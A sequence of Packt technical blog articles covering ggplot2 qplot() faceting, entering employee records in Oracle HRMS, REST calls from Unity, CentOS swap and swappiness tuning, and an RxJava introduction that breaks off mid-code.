that we simply add a smooth curve to the vector of geometry components in the qplot() function. qplot(dose, len,data=ToothGrowth, geom=c("point","smooth"), facets=.~supp) As you can see from the plot obtained (Figure 8) we now see not only clearly the different data thanks to the faceting, but we can also see the tendency of the data with respect to the dose administered. As you have seen, requiring for the smooth line in ggplot2 will also include a confidence interval in the plot. If you would like to not to have the confidence interval you may simply add the argument se=FALSE. Figure 8: Scatterplot of length vs. dose of ToothGrowth with faceting and smooth line Summary In this short article we have seen some basic concept of ggplot2, ranging from the basic principles in comparison with the other R packages for graphics, up to some basic plots as for instance histograms, density plots or scatterplots. In this case we have limited our example to the use of qplot(), which enable us to obtain plots with some easy commands, but on the other side, in order to have a full control of plot appearance as well as data representation the function ggplot() will provide you with much more advanced functionalities. 
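To give a flavour of that flexibility, here is roughly how the final faceted plot with smooth lines could be expressed using ggplot(); this is an illustrative sketch equivalent to the last qplot() call, not code taken from the book:

ggplot(data=ToothGrowth,
  aes(x=dose, y=len)) +        ## Data and aesthetic mapping
  geom_point() +               ## Geometry: data points
  stat_smooth() +              ## Statistics: smooth line with confidence interval
  facet_grid(. ~ supp)         ## Faceting by intake route

Each line maps onto one component of the grammar of graphics described earlier, which is why this style scales well as plots become more elaborate.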
You can find a more detailed description of these functions, as well as of the other features of ggplot2, illustrated with various examples in the book ggplot2 Essentials. Resources for Article: Further resources on this subject: Data Analysis Using R [article] Data visualization [article] Using R for Statistics, Research, and Graphics [article]
Entering People Information

Packt
24 Jun 2015
9 min read
In this article by Pravin Ingawale, author of the book Oracle E-Business Suite R12.x HRMS – A Functionality Guide, will learn about entering a person's information in Oracle HRMS. We will understand the hiring process in Oracle. This, actually, is part of the Oracle I-recruitment module in Oracle apps. Then we will see how to create an employee in Core HR. Then, we will learn the concept of person types and defining person types. We will also learn about entering information for an employee, including additional information. Let's see how to create an employee in core HR. (For more resources related to this topic, see here.) Creating an employee An employee is the most important entity in an organization. Before creating an employee, the HR officer must know the date from which the employee will be active in the organization. In Oracle terminology, you can call it the employee's hire date. Apart from this, the HR officer must know basic details of the employee such as first name, last name, date of birth, and so on. Navigate to US HRMS Manager | People | Enter and Maintain. This is the basic form, called People in Oracle HRMS, which is used to create an employee in the application. As you can see in the form, there is a field named Last, which is marked in yellow. This indicates that this is mandatory to create an employee record. First, you need to set the effective date on the form. You can set this by clicking on the icon, as shown in the following screenshot: You need to enter the mandatory field data along with additional data. The following screenshot shows the data entered: Once you enter the required data, you need to specify the action for the entered record. The action we have selected is Create Employment. The Create Employment action will create an employee in the application. There are other actions such as Create Applicant, which is used to create an applicant for I-Recruitment. The Create Placement action is used to create a contingent worker in your enterprise. Once you select this action, it will prompt you to enter the person type of this employee as in the following screenshot. Select the Person Type as Employee and save the record. We will see the concept of person type in the next section. Once you select the employee person type and then save the record, the system will automatically generate the employee number for the person. In our case, the system has generated an employee number 10160. So now, we have created an employee in the application. Concept of person types In any organization, you need to identify different types of people. Here, you can say that you need to group different types of people. There are basically three types of people you capture in HRMS system. They are as follows: Employees: These include current employees and past employees. Past employees are those who were part of your enterprise earlier and are no longer active in the system. You can call them terminated or ex-employees. Applicants: If you are using I-recruitment, applicants can be created. External people: Contact is a special category of external type. Contacts are associated with an employee or an applicant. For example, there might be a need to record the name, address, and phone number of an emergency contact for each employee in your organization. There might also be a need to keep information on dependents of an employee for medical insurance purposes or for some payments in payroll processing. Using person types There are predefined person types in Oracle HRMS. 
You can add more person types as per your requirements. You can also change the name of existing person types when you install the system. Let's take an example for your understanding. Your organization has employees. There might be employees of different types; you might have regular employees and employees who are contractors in your organization. Hence, you can categorize employees in your organization into two types: Regular employees Consultants The reason for creating these categories is to easily identify the employee type and store different types of information for each category. Similarly, if you are using I-recruitment, then you will have candidates. Hence, you can categorize candidates into two types. One will be internal candidate and the other will be external candidate. Internal candidates will be employees within your organization who can apply for an opening within your organization. An external candidate is an applicant who does not work for your organization but is applying for a position that is open in your company. Defining person types In an earlier section, you learned the concept of person types, and now you will learn how to define person types in the system. Navigate to US HRMS Manager | Other Definitions | Person Types. In the preceding screenshot, you can see four fields, that is, User Name, System Name, Active, and Default flag. There are eight person types recognized by the system and identified by a system name. For each system name, there are predefined usernames. A username can be changed as per your needs. There must be one username that should be the default. While creating an employee, the person types that are marked by the default flag will come by default. To change a username for a person type, delete the contents of the User Name field and type the name you'd prefer to keep. To add a new username to a person type system name: Select New Record from the Edit menu. Enter a unique username and select the system name you want to use. Deactivating person types You cannot delete person types, but you can deactivate them by unchecking the Active checkbox. Entering personal and additional information Until now, you learned how to create an employee by entering basic details such as title, gender, and date of birth. In addition to this, you can enter some other information for an employee. As you can see on the people form, there are various tabs such as Employment, Office details, Background, and so on. Each tab has some fields that can store information. For example, in our case, we have stored the e-mail address of the employee in the Office Details tab. Whenever you enter any data for an employee and then click on the Save button, it will give you two options as shown in the following screenshot: You have to select one of the options to save the data. The differences between both the options are explained with an example. Let's say you have hired a new employee as of 01-Jan-2014. Hence, a new record will be created in the application with the start date as 01-Jan-2014. This is called an effective start date of the record. There is no end date for this record, so Oracle gives it a default end date, which is 31-Dec-4712. This is called the effective end date of the record. Now, in our case, Oracle has created a single record with the start date and end date as 01-Jan-2014 and 31-Dec-4712, respectively. 
When we try to enter additional data for this record (in our case, a phone number), Oracle will prompt you to select the Correction or Update option. This is called the date-tracked option. If you select the correction mode, then Oracle will update the existing record in the application. Now, if you date track to, say, 01-Aug-2014, enter the phone number, and select the update mode, then it will end-date the historical record with the new date minus one and create a new record with the start date 01-Aug-2014 and the phone number that you have entered. Thus, the historical data will be preserved and a new record will be created with the start date 01-Aug-2014 and a phone number.

The following tabular representation will help you understand Correction mode better:

Employee Number   LastName     Effective Start Date   Effective End Date   Phone Number
10160             Test010114   01-Jan-2014            31-Dec-4712          +0099999999

Now, if you change the phone number from 01-Aug-2014 in Update mode (date tracked to 01-Aug-2014), then the records will be as follows:

Employee Number   LastName     Effective Start Date   Effective End Date   Phone Number
10160             Test010114   01-Jan-2014            31-Jul-2014          +0099999999
10160             Test010114   01-Aug-2014            31-Dec-4712          +0088888888

Thus, in update mode, you can see that the historical data is intact. If HR wants to view some historical data, then the HR employee can easily view this data. Everything associated with Oracle HRMS is date-tracked. Every characteristic about the organization, person, position, salary, and benefits is tightly date-tracked. This concept is very important in Oracle and is used in almost all the forms in which you store employee-related information. Thus, you have learned about the date-tracking concept in Oracle Apps.

There are some additional fields, which can be configured as per your requirements. Additional personal data can be stored in these fields. These are called descriptive flexfields (DFF) in Oracle. We created a personal DFF to store data about Years of Industry Experience and whether an employee is Oracle Certified or not. This data can be stored in the People form DFF as marked in the following screenshot: When you click on the box, it will open a new form as shown in the following screenshot. Here, you can enter the additional data. This is called the Additional Personal Details DFF. It is stored with the personal data; this is normally referred to as the People form DFF.

We have created a Special Information Type (SIT) to store information on the languages known by an employee. This data will have two attributes, namely, the language known and the fluency. This can be entered by navigating to US HRMS Manager | People | Enter and Maintain | Special Info. Click on the Details section. This will open a new form to enter the required details. Each record in the SIT is date-tracked. You can enter the start date and the end date. Thus, we have seen the DFF, in which you store additional person data, and the KFF, through which you enter the SIT data.

Summary

In this article, you have learned about creating a new employee, entering employee data, and entering additional data using DFF and KFF. You also learned the concept of person type. Resources for Article: Further resources on this subject: Knowing the prebuilt marketing, sales, and service organizations [article] Oracle E-Business Suite with Desktop Integration [article] Oracle Integration and Consolidation Products [article]
Using a REST API with Unity Part 1

Denny and Travis
24 Jun 2015
6 min read
Introduction

While developing a game, there are a number of reasons why you would want to connect to a server. Downloading new assets, such as models, or collecting data from an external source is one reason. Serving asset bundles through your own server allows your game to connect to it and download the most recent versions of those bundles. Suppose your game also allowed users to see whether an item was available at Amazon, and for what price. If you had the SKU number available, you could connect to Amazon's API and check the price and availability of that item. The most common way to connect to external APIs these days is through a RESTful API.

What is a REST API

A RESTful API is a common approach to creating scalable web services. It provides users with endpoints to collect and create data using the same HTTP verbs used to fetch web pages (GET, POST, PUT, DELETE). For example, a URL like www.fake.com/users could return a JSON of user data. Of course, there is often more security involved with these calls, but this is a good starting point. Once you begin understanding REST APIs, querying them becomes second nature.

Before doing anything in code, you can try a query! Go to the browser and open the URL http://jsonplaceholder.typicode.com/posts. You should be returned a JSON of some post data. You can see REST endpoints in action already. Your browser sent a GET request to the /posts endpoint, which returned all the posts. What if we want just a specific post? The standard way to do this is to add the id of the post next, like this: http://jsonplaceholder.typicode.com/posts/1. You should get just a single post this time. Great! When building Unity scripts to connect to a REST endpoint, we'll frequently use this site for testing before we move on to the actual REST endpoints we want.

Setting up your own server

Setting up our own server is a bit out of the scope of this article. In previous projects, we've used a framework like Sails.js to create a Node server with REST endpoints.

Parsing JSON in Unity

Basic REST

One of the worst parts of querying REST data is the parsing in Unity. Compared to parsing JSON on the web, Unity's parsing can feel tricky. The primary tool we use to make life a little easier is called SimpleJSON. It allows us to create JSON objects in C#, which we can use to build or read JSON data and then manipulate them to our needs. We won't be going into detail on how to use SimpleJSON, as much as just using the data retrieved from it. For further reading, we recommend looking at their documentation. Just note, though, that SimpleJSON does not allow for parsing of GameObjects and such in Unity; instead, it deals only with more primitive attributes like strings and floats.

For example, let's assume we wanted to upload a list of products to a server from our Unity project, without the game running (in the editor). Assuming we collected the data from our game and it's currently residing in a JSON file, let's see the code on how we can upload this data to the server from Unity.
string productlist = File.ReadAllText(Application.dataPath + "/Resources/AssetBundles/" + "AssetBundleInfo.json"); UploadProductListJSON(productList); static void UploadProductListJSON(string data) { Debug.Log (data); WWWForm form = new WWWForm(); form.AddField("productlist", data); WWW www = new WWW("localhost:1337/product/addList", form); } So we pass the collected data to a function that will create a new form, add the data to that form and then use the WWW variable to upload our form to the server. This will use the POST request to add new data. We normally don't want to create a different end point to add data, such as /addList. We could have added data one at a time, and used the standard REST endpoint (/product). This would likely be the cleaner solution, but for the sake of simplicity, we've added an endpoint that accepts a list of data. Building REST Factories for In Game REST Calls Rather than having random scripts containing API calls, we recommend following the standard web procedure and building REST factories. Scripts with the sole purpose of querying rest endpoints. When contacting a server from in game, the standard approach is to use a coroutine, as to not lock your game on the thread. Let's take a look at the standard DB factory we use. private string results; public String Results { get { return results; } } public WWW GET(string url, System.Action onComplete ) { WWW www = new WWW (url); StartCoroutine (WaitForRequest (www, onComplete)); return www; } public WWW POST(string url, Dictionary<string,string> post, System.Action onComplete) { WWWForm form = new WWWForm(); foreach(KeyValuePair<string,string> post_arg in post) { form.AddField(post_arg.Key, post_arg.Value); } WWW www = new WWW(url, form); StartCoroutine(WaitForRequest(www, onComplete)); return www; } private IEnumerator WaitForRequest(WWW www, System.Action onComplete) { yield return www; // check for errors if (www.error == null) { results = www.text; onComplete(); } else { Debug.Log (www.error); } } The url data here would be something like our example above: http://jsonplaceholder.typicode.com/posts. The System.Action OnComplete is a callback to be called once the action is complete. This will normally be some method that requires the downloaded data. In both our GET and POST methods, we will connect to a passed URL, and then pass our www objects to a co-routine. This will allow our game to continue while the queries are being resolved in the WaitForRequest method. This method will either collect the result, and call any callbacks, or it will log the error for us. Conclusion This just touches the basics of building a game that allows connecting and usage of REST endpoints. In later editions, we can talk about building a thorough, modular system to connect to REST endpoints, extracting meaningful data from your queries using simple JSON, user authentication, and how to build a manager system to handle multiple REST calls. About the Authors Denny is a Mobile Application Developer at Canadian Tire Development Operations. While working, Denny regularly uses Unity to create in-store experiences, but also works on other technologies like Famous, Phaser.IO, LibGDX, and CreateJS when creating game-like apps. He also enjoys making non-game mobile apps, but who cares about that, am I right? Travis is a Software Engineer, living in the bitter region of Winnipeg, Canada. His work and hobbies include Game Development with Unity or Phaser.IO, as well as Mobile App Development. 
He can enjoy a good video game or two, but only if he knows he'll win!
Tuning server performance with memory management and swap

Packt
24 Jun 2015
7 min read
In this article, by Jonathan Hobson, the author of Troubleshooting CentOS, we will learn about memory management, swap, and swappiness. (For more resources related to this topic, see here.) A deeper understanding of the underlying active processes in CentOS 7 is an essential skill for any troubleshooter. From high load averages to slow response times, system overloads to dead and dying processes, there comes a time when every server may start to feel sluggish, act impoverished, or fail to respond, and as a consequence, it will require your immediate attention. Regardless of how you look at it, the question of memory usage remains critical to the life cycle of a system, and whether you are maintaining system health or troubleshooting a particular service or application, you will always need to remember that the use of memory is a critical resource to your system. For this reason, we will begin by calling the free command in the following way: # free -m The main elements of the preceding command will look similar to this:          Total   used   free   shared   buffers   cached Mem:     1837     274   1563         8         0       108 -/+ buffers/cache: 164   1673 Swap:     2063       0   2063 In the example shown, I have used the -m option to ensure that the output is formatted in megabytes. This makes it easier to read, but for the sake of troubleshooting, rather than trying to understand every numeric value shown, let's reduce the scope of the original output to highlight the relevant area of concern: -/+ buffers/cache: 164   1673 The importance of this line is based on the fact that it accounts for the associated buffers and caches to illustrate what memory is currently being used and what is held in reserve. Where the first value indicates how much memory is being used, the second value tells us how much memory is available to our applications. In the example shown, this instance translates into 164 MB of used memory and 1673 MB of available memory. Bearing this in mind, let me draw your attention to the final line in order that we can examine the importance of swap: Swap:     2063       0   2063 Swapping typically occurs when memory usage is impacting performance. As we can see from the preceding example, the first value tells us that there is a total amount of system swap set at 2063 MB, with the second value indicating how much swap is being used (0 MB), while the third value shows the amount of swap that is still available to the system as a whole (2063 MB). So yes, based on the example data shown here, we can conclude that this is a healthy system, and no swap is being used, but while we are here, let's use this time to discover more about the swap space on your system. To begin, we will revisit the contents of the proc directory and reveal the total and used swap size by typing the following command: # cat /proc/swaps Assuming that you understand the output shown, you should then investigate the level of swappiness used by your system with the following command: # cat /proc/sys/vm/swappiness Having done this, you will now see a numeric value between the ranges of 0-100. The numeric value is a percentage and it implies that, if your system has a value of 30, for example, it will begin to use swap memory at 70 percent occupation of RAM. The default for all Linux systems is usually set with a notional value between 30 to 60, but you can use either of the following commands to temporarily change and modify the swappiness of your system. 
This can be achieved by replacing the value of X with a numeric value from 1-100 by typing: # echo X > /proc/sys/vm/swappiness Or more specifically, this can also be achieved with: # sysctl -w vm.swappiness=X If you change your mind at any point, then you have two options in order to ensure that no permanent changes have been made. You can either repeat one of the preceding two commands and return the original values, or issue a full system reboot. On the other hand, if you want to make the change persist, then you should edit the /etc/sysctl.conf file and add your swappiness preferences in the following way: vm.swappiness=X When complete, simply save and close the file to ensure that the changes take effect. The level of swappiness controls the tendency of the kernel to move a process out of the physical RAM on to a swap disk. This is memory management at work, but it is important to realize that swapping will not occur immediately, as the level of swappiness is actually expressed as a percentage value. For this reason, the process of swapping should be viewed more as a measurement of preference when using the cache, and as every administrator will know, there is an option for you to clear the swap by using the commands swapoff -a and swapon -a to achieve the desired result. The golden rule is to realize that a system displaying a level of swappiness close to the maximum value (100) will prefer to begin swapping inactive pages. This is because a value of 100 is a representative of 0 percent occupation of RAM. By comparison, the closer your system is to the lowest value (0), the less likely swapping is to occur as 0 is representative of 100 percent occupation of RAM. Generally speaking, we would all probably agree that systems with a very large pool of RAM would not benefit from aggressive swapping. However, and just to confuse things further, let's look at it in a different way. We all know that a desktop computer will benefit from a low swappiness value, but in certain situations, you may also find that a system with a large pool of RAM (running batch jobs) may also benefit from a moderate to aggressive swap in a fashion similar to a system that attempts to do a lot but only uses small amounts of RAM. So, in reality, there are no hard and fast rules; the use of swap should be based on the needs of the system in question rather than looking for a single solution that can be applied across the board. Taking this further, special care and consideration should be taken while making changes to the swapping values as RAM that is not used by an application is used as disk cache. In this situation, by decreasing swappiness, you are actually increasing the chance of that application not being swapped-out, and you are thereby decreasing the overall size of the disk cache. This can make disk access slower. However, if you do increase the preference to swap, then because hard disks are slower than memory modules, it can lead to a slower response time across the overall system. Swapping can be confusing, but by knowing this, we can also appreciate the hidden irony of swappiness. As Newton's third law of motion states, for every action, there is an equal and opposite reaction, and finding the optimum swappiness value may require some additional experimentation. Summary In this article, we learned some basic yet vital commands that help us gauge and maintain server performance with the help of swapiness. 
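As a quick recap of the commands covered in this article, a typical tuning session on CentOS 7 might look like the following. The value of 10 is purely illustrative and should be chosen to suit your own workload; run these commands as root:

# free -m                                        (check memory and swap usage)
# cat /proc/swaps                                (review the configured swap areas)
# cat /proc/sys/vm/swappiness                    (inspect the current swappiness value)
# sysctl -w vm.swappiness=10                     (apply a lower value temporarily)
# echo "vm.swappiness=10" >> /etc/sysctl.conf    (make the change persistent)
# sysctl -p                                      (reload the settings from /etc/sysctl.conf)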
Resources for Article: Further resources on this subject: Installing CentOS [article] Managing public and private groups [article] Installing PostgreSQL [article]
An Introduction to Reactive Programming

Packt
24 Jun 2015
23 min read
In this article written by Nickolay Tsvetinov, author of the book Learning Reactive Programming with Java 8, this article will present RxJava (https://github.com/ReactiveX/RxJava), an open source Java implementation of the reactive programming paradigm. Writing code using RxJava requires a different kind of thinking, but it will give you the power to create complex logic using simple pieces of well-structured code. In this article, we will cover: What reactive programming is Reasons to learn and use this style of programming Setting up RxJava and comparing it with familiar patterns and structures A simple example with RxJava (For more resources related to this topic, see here.) What is reactive programming? Reactive programming is a paradigm that revolves around the propagation of change. In other words, if a program propagates all the changes that modify its data to all the interested parties (users, other programs, components, and subparts), then this program can be called reactive. A simple example of this is Microsoft Excel. If you set a number in cell A1 and another number in cell 'B1', and set cell 'C1' to SUM(A1, B1); whenever 'A1' or 'B1' changes, 'C1' will be updated to be their sum. Let's call this the reactive sum. What is the difference between assigning a simple variable c to be equal to the sum of the a and b variables and the reactive sum approach? In a normal Java program, when we change 'a' or 'b', we will have to update 'c' ourselves. In other words, the change in the flow of the data represented by 'a' and 'b', is not propagated to 'c'. Here is this illustrated through source code: int a = 4; int b = 5; int c = a + b; System.out.println(c); // 9   a = 6; System.out.println(c); // 9 again, but if 'c' was tracking the changes of 'a' and 'b', // it would've been 6 + 5 = 11 This is a very simple explanation of what "being reactive" means. Of course, there are various implementations of this idea and there are various problems that these implementations must solve. Why should we be reactive? The easiest way for us to answer this question is to think about the requirements we have while building applications these days. While 10-15 years ago it was normal for websites to go through maintenance or to have a slow response time, today everything should be online 24/7 and should respond with lightning speed; if it's slow or down, users would prefer an alternative service. Today slow means unusable or broken. We are working with greater volumes of data that we need to serve and process fast. HTTP failures weren't something rare in the recent past, but now, we have to be fault-tolerant and give our users readable and reasonable message updates. In the past, we wrote simple desktop applications, but today we write web applications, which should be fast and responsive. In most cases, these applications communicate with a large number of remote services. These are the new requirements we have to fulfill if we want our software to be competitive. So in other words we have to be: Modular/dynamic: This way, we will be able to have 24/7 systems, because modules can go offline and come online without breaking or halting the entire system. Additionally, this helps us better structure our applications as they grow larger and manage their code base. Scalable: This way, we are going to be able to handle a huge amount of data or large numbers of user requests. Fault-tolerant: This way, the system will appear stable to its users. Responsive: This means fast and available. 
Let's think about how to accomplish this: We can become modular if our system is event-driven. We can divide the system into multiple micro-services/components/modules that are going to communicate with each other using notifications. This way, we are going to react to the data flow of the system, represented by notifications. To be scalable means to react to the ever-growing data, to react to load without falling apart. Reacting to failures/errors will make the system more fault-tolerant. To be responsive means reacting to user activity in a timely manner. If the application is event-driven, it can be decoupled into multiple self-contained components. This helps us become more scalable, because we can always add new components or remove old ones without stopping or breaking the system. If errors and failures are passed to the right component, which can handle them as notifications, the application can become more fault-tolerant or resilient. So if we build our system to be event-driven, we can more easily achieve scalability and failure tolerance, and a scalable, decoupled, and error-proof application is fast and responsive to users. The Reactive Manifesto (http://www.reactivemanifesto.org/) is a document defining the four reactive principles that we mentioned previously. Each reactive system should be message-driven (event-driven). That way, it can become loosely coupled and therefore scalable and resilient (fault-tolerant), which means it is reliable and responsive (see the preceding diagram). Note that the Reactive Manifesto describes a reactive system and is not the same as our definition of reactive programming. You can build a message-driven, resilient, scalable, and responsive application without using a reactive library or language. Changes in the application data can be modeled with notifications, which can be propagated to the right handlers. So, writing applications using reactive programming is the easiest way to comply with the Manifesto. Introducing RxJava To write reactive programs, we need a library or a specific programming language, because building something like that ourselves is quite a difficult task. Java is not really a reactive programming language (it provides some tools like the java.util.Observable class, but they are quite limited). It is a statically typed, object-oriented language, and we write a lot of boilerplate code to accomplish simple things (POJOs, for example). But there are reactive libraries in Java that we can use. In this article, we will be using RxJava (developed by people in the Java open source community, guided by Netflix). Downloading and setting up RxJava You can download and build RxJava from Github (https://github.com/ReactiveX/RxJava). It requires zero dependencies and supports Java 8 lambdas. The documentation provided by its Javadoc and the GitHub wiki pages is well structured and some of the best out there. Here is how to check out the project and run the build: $ git clone git@github.com:ReactiveX/RxJava.git $ cd RxJava/ $ ./gradlew build Of course, you can also download the prebuilt JAR. For this article, we'll be using version 1.0.8. 
If you use Maven, you can add RxJava as a dependency to your pom.xml file: <dependency> <groupId>io.reactivex</groupId> <artifactId>rxjava</artifactId> <version>1.0.8</version> </dependency> Alternatively, for Apache Ivy, put this snippet in your Ivy file's dependencies: <dependency org="io.reactivex" name="rxjava" rev="1.0.8" /> If you use Gradle instead, update your build.gradle file's dependencies as follows: dependencies { ... compile 'io.reactivex:rxjava:1.0.8' ... } Now, let's take a peek at what RxJava is all about. We are going to begin with something well known, and gradually get into the library's secrets. Comparing the iterator pattern and the RxJava observable As a Java programmer, it is highly possible that you've heard or used the Iterator pattern. The idea is simple: an Iterator instance is used to traverse through a container (collection/data source/generator), pulling the container's elements one by one when they are required, until it reaches the container's end. Here is a little example of how it is used in Java: List<String> list = Arrays.asList("One", "Two", "Three", "Four", "Five"); // (1)   Iterator<String> iterator = list.iterator(); // (2)   while(iterator.hasNext()) { // 3 // Prints elements (4) System.out.println(iterator.next()); } Every java.util.Collection object is an Iterable instance which means that it has the method iterator(). This method creates an Iterator instance, which has as its source the collection. Let's look at what the preceding code does: We create a new List instance containing five strings. We create an Iterator instance from this List instance, using the iterator() method. The Iterator interface has two important methods: hasNext() and next(). The hasNext() method is used to check whether the Iterator instance has more elements for traversing. Here, we haven't begun going through the elements, so it will return True. When we go through the five strings, it will return False and the program will proceed after the while loop. The first five times, when we call the next() method on the Iterator instance, it will return the elements in the order they were inserted in the collection. So the strings will be printed. In this example, our program consumes the items from the List instance using the Iterator instance. It pulls the data (here, represented by strings) and the current thread blocks until the requested data is ready and received. So, for example, if the Iterator instance was firing a request to a web server on every next() method call, the main thread of our program would be blocked while waiting for each of the responses to arrive. RxJava's building blocks are the observables. The Observable class (note that this is not the java.util.Observable class that comes with the JDK) is the mathematical dual of the Iterator class, which basically means that they are like the two sides of the same coin. It has an underlying collection or computation that produces values that can be consumed by a consumer. But the difference is that the consumer doesn't "pull" these values from the producer like in the Iterator pattern. It is exactly the opposite; the producer 'pushes' the values as notifications to the consumer. 
Here is an example of the same program but written using an Observable instance: List<String> list = Arrays.asList("One", "Two", "Three", "Four", "Five"); // (1)   Observable<String> observable = Observable.from(list); // (2)   observable.subscribe(new Action1<String>() { // (3) @Override public void call(String element) {    System.out.println(element); // Prints the element (4) } }); Here is what is happening in the code: We create the list of strings in the same way as in the previous example. Then, we create an Observable instance from the list, using the from(Iterable<? extends T> iterable) method. This method is used to create instances of Observable that send all the values synchronously from an Iterable instance (the list in our case) one by one to their subscribers (consumers). Here, we can subscribe to the Observable instance. By subscribing, we tell RxJava that we are interested in this Observable instance and want to receive notifications from it. We subscribe using an anonymous class implementing the Action1 interface, by defining a single method—call(T). This method will be called by the Observable instance every time it has a value, ready to be pushed. Always creating new Action1 instances may seem too verbose, but Java 8 solves this verbosity. So, every string from the source list will be pushed through to the call() method, and it will be printed. Instances of the RxJava Observable class behave somewhat like asynchronous iterators, which notify their subscribers/consumers by themselves that there is a next value. In fact, the Observable class adds to the classic Observer pattern (implemented in Java by java.util.Observable; see Design Patterns: Elements of Reusable Object-Oriented Software by the Gang of Four) two capabilities that are available in the Iterable/Iterator approach: The ability to signal the consumer that there is no more data available. Instead of calling the hasNext() method, we can attach a subscriber to listen for an 'OnCompleted' notification. The ability to signal the subscriber that an error has occurred. Instead of try-catching an error, we can attach an error listener to the Observable instance. These listeners can be attached using the subscribe(Action1<? super T>, Action1 <Throwable>, Action0) method. Let's expand the Observable instance example by adding error and completed listeners: List<String> list = Arrays.asList("One", "Two", "Three", "Four", "Five");   Observable<String> observable = Observable.from(list); observable.subscribe(new Action1<String>() { @Override public void call(String element) {    System.out.println(element); } }, new Action1<Throwable>() { @Override public void call(Throwable t) {    System.err.println(t); // (1) } }, new Action0() { @Override public void call() {    System.out.println("We've finished!"); // (2) } }); The new things here are: If there is an error while processing the elements, the Observable instance will send this error through the call(Throwable) method of this listener. This is analogous to the try-catch block in the Iterator instance example. When everything finishes, this call() method will be invoked by the Observable instance. This is analogous to using the hasNext() method in order to see if the traversal over the Iterable instance has finished and printing "We've finished!". We saw how we can use the Observable instances and that they are not so different from something familiar to us—the Iterator instance. 
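Because Action1, Action1<Throwable>, and Action0 are all single-method interfaces, the same subscription can be written far more compactly with the Java 8 lambdas mentioned previously. The following is a minimal, self-contained sketch of the expanded example in that style; the class name is ours, purely for illustration:

import java.util.Arrays;
import java.util.List;
import rx.Observable;

public class LambdaSubscribeExample {
    public static void main(String[] args) {
        List<String> list = Arrays.asList("One", "Two", "Three", "Four", "Five");

        // The same three listeners as before, expressed as lambdas:
        // onNext, onError, and onCompleted, in that order.
        Observable.from(list).subscribe(
            element -> System.out.println(element),
            error -> System.err.println(error),
            () -> System.out.println("We've finished!")
        );
    }
}

The behavior is identical to the anonymous-class version; only the notation changes.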
These Observable instances can be used for building asynchronous streams and pushing data updates to their subscribers (they can have multiple subscribers). This is an implementation of the reactive programming paradigm. The data is being propagated to all the interested parties—the subscribers. Coding using such streams is a more functional-style implementation of reactive programming. Of course, there are formal definitions and complex terms for it, but this is the simplest explanation. Subscribing to events should be familiar; for example, clicking on a button in a GUI application fires an event which is propagated to the subscribers—handlers. But, using RxJava, we can create data streams from anything—file input, sockets, responses, variables, caches, user inputs, and so on. On top of that, consumers can be notified that the stream is closed, or that there has been an error. So, by using these streams, our applications can react to failure. To summarize, a stream is a sequence of ongoing messages/events, ordered as they are processed in real time. It can be looked at as a value that is changing through time, and these changes can be observed by subscribers (consumers), dependent on it. So, going back to the example from Excel, we have effectively replaced the traditional variables with "reactive variables" or RxJava's Observable instances. Implementing the reactive sum Now that we are familiar with the Observable class and the idea of how to use it to code in a reactive way, we are ready to implement the reactive sum, mentioned at the beginning of this article. Let's look at the requirements our program must fulfill: It will be an application that runs in the terminal. Once started, it will run until the user enters exit. If the user enters a:<number>, the a collector will be updated to the <number>. If the user enters b:<number>, the b collector will be updated to the <number>. If the user enters anything else, it will be skipped. When both the a and b collectors have initial values, their sum will automatically be computed and printed on the standard output in the format a + b = <sum>. On every change in a or b, the sum will be updated and printed. The first piece of code represents the main body of the program: ConnectableObservable<String> input = from(System.in); // (1)   Observable<Double> a = varStream("a", input); // (2) Observable<Double> b = varStream("b", input);   ReactiveSum sum = new ReactiveSum(a, b); // (3)   input.connect(); // (4) There are a lot of new things happening here: The first thing we must do is to create an Observable instance, representing the standard input stream (System.in). So, we use the from(InputStream) method (implementation will be presented in the next code snippet) to create a ConnectableObservable variable from the System.in. The ConnectableObservable variable is an Observable instance and starts emitting events coming from its source only after its connect() method is called. We create two Observable instances representing the a and b values, using the varStream(String, Observable) method, which we are going to examine later. The source stream for these values is the input stream. We create a ReactiveSum instance, dependent on the a and b values. And now, we can start listening to the input stream. This code is responsible for building dependencies in the program and starting it off. The a and b values are dependent on the user input and their sum is dependent on them. 
Now let's look at the implementation of the from(InputStream) method, which creates an Observable instance with the java.io.InputStream source: static ConnectableObservable<String> from(final InputStream stream) { return from(new BufferedReader(new InputStreamReader(stream))); // (1) }   static ConnectableObservable<String> from(final BufferedReader reader) { return Observable.create(new OnSubscribe<String>() { // (2)    @Override    public void call(Subscriber<? super String> subscriber) {      if (subscriber.isUnsubscribed()) { // (3)        return;      }      try {        String line;        while (!subscriber.isUnsubscribed() &&          (line = reader.readLine()) != null) { // (4)            if (line.equals("exit")) { // (5)              break;            }            subscriber.onNext(line); // (6)        }      }      catch (IOException e) { // (7)        subscriber.onError(e);      }      if (!subscriber.isUnsubscribed()) { // (8)        subscriber.onCompleted();      }    } }).publish(); // (9) } This is one complex piece of code, so let's look at it step-by-step: This method implementation converts its InputStream parameter to a BufferedReader object and calls the from(BufferedReader) method. We are doing that because we are going to use strings as data, and working with the Reader instance is easier. So the actual implementation is in the second method. It returns an Observable instance, created using the Observable.create(OnSubscribe) method. This method is the one we are going to use the most in this article. It is used to create Observable instances with custom behavior. The rx.Observable.OnSubscribe interface passed to it has one method, call(Subscriber). This method is used to implement the behavior of the Observable instance because the Subscriber instance passed to it can be used to emit messages to the Observable instance's subscriber. A subscriber is the client of an Observable instance, which consumes its notifications. If the subscriber has already unsubscribed from this Observable instance, nothing should be done. The main logic is to listen for user input, while the subscriber is subscribed. Every line the user enters in the terminal is treated as a message. This is the main loop of the program. If the user enters the word exit and hits Enter, the main loop stops. Otherwise, the message the user entered is passed as a notification to the subscriber of the Observable instance, using the onNext(T) method. This way, we pass everything to the interested parties. It's their job to filter out and transform the raw messages. If there is an IO error, the subscribers are notified with an OnError notification through the onError(Throwable) method. If the program reaches here (through breaking out of the main loop) and the subscriber is still subscribed to the Observable instance, an OnCompleted notification is sent to the subscribers using the onCompleted() method. With the publish() method, we turn the new Observable instance into a ConnectableObservable instance. We have to do this because, otherwise, for every subscription to this Observable instance, our logic will be executed from the beginning. In our case, we want to execute it only once and all the subscribers to receive the same notifications; this is achievable with the use of a ConnectableObservable instance. This illustrates a simplified way to turn Java's IO streams into Observable instances. 
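To make the role of publish() and connect() more concrete, here is a small, self-contained sketch (the class name and the sample values are ours, purely for illustration) showing that a ConnectableObservable instance emits nothing until connect() is called, and that all subscribers registered before that point share the same notifications:

import rx.Observable;
import rx.observables.ConnectableObservable;

public class ConnectExample {
    public static void main(String[] args) {
        // publish() turns the Observable into a ConnectableObservable.
        ConnectableObservable<Integer> numbers = Observable.just(1, 2, 3).publish();

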